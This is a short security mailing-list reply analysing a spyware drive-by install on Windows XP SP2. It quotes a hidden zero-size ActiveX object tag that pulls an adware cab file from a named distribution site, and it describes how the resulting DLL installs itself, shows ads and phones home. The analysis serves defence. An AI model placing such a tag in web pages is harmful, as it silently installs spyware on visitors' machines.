SV: Spyware installs ... XP SP2 box

Hi,

The installed code is definitely:

<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
HEIGHT=0 WIDTH=0></object>

Correct and there's nothing new here. If executed the code will run a
trojan-downloader. Actually, it's more a variant of FavoriteMan. A known
adware/spyware.

ATPartners.dll is programmed in Visual C++ and packed with UPX. ATPartners
will copy itself to the windows systemfolder and register IE Browser Helper
Objects. The code will present several ads at random time and potential sent
private information to a remote host. The data collected from the system is
stored in im64.dll. However, the code can update itself by downloading
components from www.f1organizer.com.

A search for ATPartners.dll should bring up several hits.

Peter Kruse
